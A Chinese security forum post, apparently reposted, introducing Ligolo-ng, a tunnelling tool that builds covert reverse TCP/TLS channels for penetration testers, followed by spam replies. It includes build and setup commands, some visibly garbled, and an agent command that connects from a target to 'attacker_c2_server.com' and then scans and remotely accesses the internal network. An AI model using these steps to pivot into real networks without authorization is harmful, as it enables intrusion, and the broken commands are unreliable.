点击联系客服
客服QQ: 客服微信:
搜索
热搜: 活动 交友 discuz
Hi~登录注册
查看: 341|回复: 50

[网络安全]不需要SOCKS支持 很多渗透测试人员帮助建立隐秘的通信频道

[复制链接]

1

主题

1

帖子

-7

积分

限制会员

积分
-7
发表于 2021-9-27 08:00:04 | 显示全部楼层 |阅读模式



关于Ligolo-ng

Ligolo-ng是基于TUN接口实现功能的高级通道工具。Ligolo-ng是一款轻量级快速工具,无需SOCKS支持,即可通过反向TCP/TLS连接建立隐藏的通信信道。

功能介绍

Tun接口(不再需要SOCKS);

支持代理和网络信息选择的简单UI界面

使用方便,安装方便。

基于Let's  Encrypt的自动证书配置

高性能(多路复用);

不需要高级权限。

套接字接收/代理绑定

多平台代理支持

工具构建

构建Ligolo-ng

$ go  build-o  agent  cmd/agent/main  . go

$ go  build-o  proxy  cmd/proxy/main  . go

# Build  agent  for  Windows

$ GOOS=windows  go  build-o  agent  . exe  cmd/agent/main  . go

安装Ligolo-ng

必须在自己的命令控制服务器上打开代理服务。默认使用端口11601接收。

$ sudo  iptun  tap  add  user[your  _ username]mode  tun  LIGO  lo

$ sudo  IP  link  set  ligolo  up

$
punctuation">./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

工具使用
首先,我们需要在目标设备上启动代理(无需特殊权限):

$ ./agent -connect attacker_c2_server.com:11601

此时,代理服务器上将出现一条会话链接:

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

使用“session”命令选择代理:

ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

使用“ifconfig”命令显示代理的网络配置信息:

[Agent : nchatelain@nworkstation] » ifconfig
[...]
┌─────────────────────────────────────────────┐
│ Interface 3                                 │
├──────────────┬──────────────────────────────┤
│ Name         │ wlp3s0                       │
│ Hardware MAC │ de:ad:be:ef:ca:fe            │
│ MTU          │ 1500                         │
│ Flags        │ up|broadcast|multicast       │
│ IPv4 Address │ 192.168.0.30/24             │
└──────────────┴──────────────────────────────┘

在代理/中继服务器上添加一条指向192.168.0.0/24代理网络的路由:

$ sudo ip route add 192.168.0.0/24 dev ligolo

最后,在代理上开启一条通信信道:

[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation   

现在,你就可以通过代理服务器访问192.168.0.0/24代理网络:

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

支持的协议/数据包
TCP

UDP

ICMP

性能
在Ligolo-ng的帮助下,你可以轻松达到100 Mbits/秒的速度。下面给出的测试结果是在一台200Mbits/s服务器上使用iperf测试的一条200Mbits/s的链接:

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[  5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval           Transfer     Bitrate         Retr  Cwnd
[  5]   0.00-1.00   sec  12.5 MBytes   105 Mbits/sec    0    164 KBytes      
[  5]   1.00-2.00   sec  12.7 MBytes   107 Mbits/sec    0    263 KBytes      
[  5]   2.00-3.00   sec  12.4 MBytes   104 Mbits/sec    0    263 KBytes      
[  5]   3.00-4.00   sec  12.7 MBytes   106 Mbits/sec    0    263 KBytes      
[  5]   4.00-5.00   sec  13.1 MBytes   110 Mbits/sec    2    134 KBytes      
[  5]   5.00-6.00   sec  13.4 MBytes   113 Mbits/sec    0    147 KBytes      
[  5]   6.00-7.00   sec  12.6 MBytes   105 Mbits/sec    0    158 KBytes      
[  5]   7.00-8.00   sec  12.1 MBytes   101 Mbits/sec    0    173 KBytes      
[  5]   8.00-9.00   sec  12.7 MBytes   106 Mbits/sec    0    182 KBytes      
[  5]   9.00-10.00  sec  12.6 MBytes   106 Mbits/sec    0    188 KBytes      
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate         Retr
[  5]   0.00-10.00  sec   127 MBytes   106 Mbits/sec    2             sender
[  5]   0.00-10.08  sec   125 MBytes   104 Mbits/sec                  receiver

注意事项
由于代理并不是以高级权限运行的,因此无法转发原始数据包。当你执行“NMAP SYN-SCAN”的时候,代理上会执行一次TCP connect()。

在使用Nmap时,你应该使用“–unprivileged”或“-PE”以避免假阳性。

工具使用演示
视频地址:【点我观看】


网络安全学习攻略
回复

使用道具 举报

0

主题

369

帖子

-214

积分

限制会员

积分
-214
发表于 2021-9-27 08:06:24 | 显示全部楼层
我是来刷分的,嘿嘿
回复

使用道具 举报

0

主题

392

帖子

-243

积分

限制会员

积分
-243
发表于 2021-9-27 08:38:36 | 显示全部楼层
学习了,不错,讲的太有道理了
回复

使用道具 举报

1

主题

371

帖子

-245

积分

限制会员

积分
-245
发表于 2021-9-27 09:11:48 | 显示全部楼层
谢谢楼主,共同发展
回复

使用道具 举报

1

主题

369

帖子

-210

积分

限制会员

积分
-210
发表于 2021-9-27 09:32:16 | 显示全部楼层
相当不错,感谢无私分享精神!
回复

使用道具 举报

1

主题

373

帖子

-214

积分

限制会员

积分
-214
发表于 2021-9-27 09:57:55 | 显示全部楼层
帮你顶下哈!!
回复

使用道具 举报

1

主题

408

帖子

-234

积分

限制会员

积分
-234
发表于 2021-9-27 10:38:17 | 显示全部楼层
帮帮顶顶!!
回复

使用道具 举报

1

主题

353

帖子

-209

积分

限制会员

积分
-209
发表于 2021-9-27 11:08:19 | 显示全部楼层
路过,支持一下啦
回复

使用道具 举报

1

主题

401

帖子

-245

积分

限制会员

积分
-245
发表于 2021-9-27 11:49:58 | 显示全部楼层
没看完~~~~~~ 先顶,好同志
回复

使用道具 举报

0

主题

380

帖子

-261

积分

限制会员

积分
-261
发表于 2021-9-27 12:14:26 | 显示全部楼层
LZ说的很不错
回复

使用道具 举报

游客
回复
您需要登录后才可以回帖 登录 | 立即注册

快速回复 返回顶部 返回列表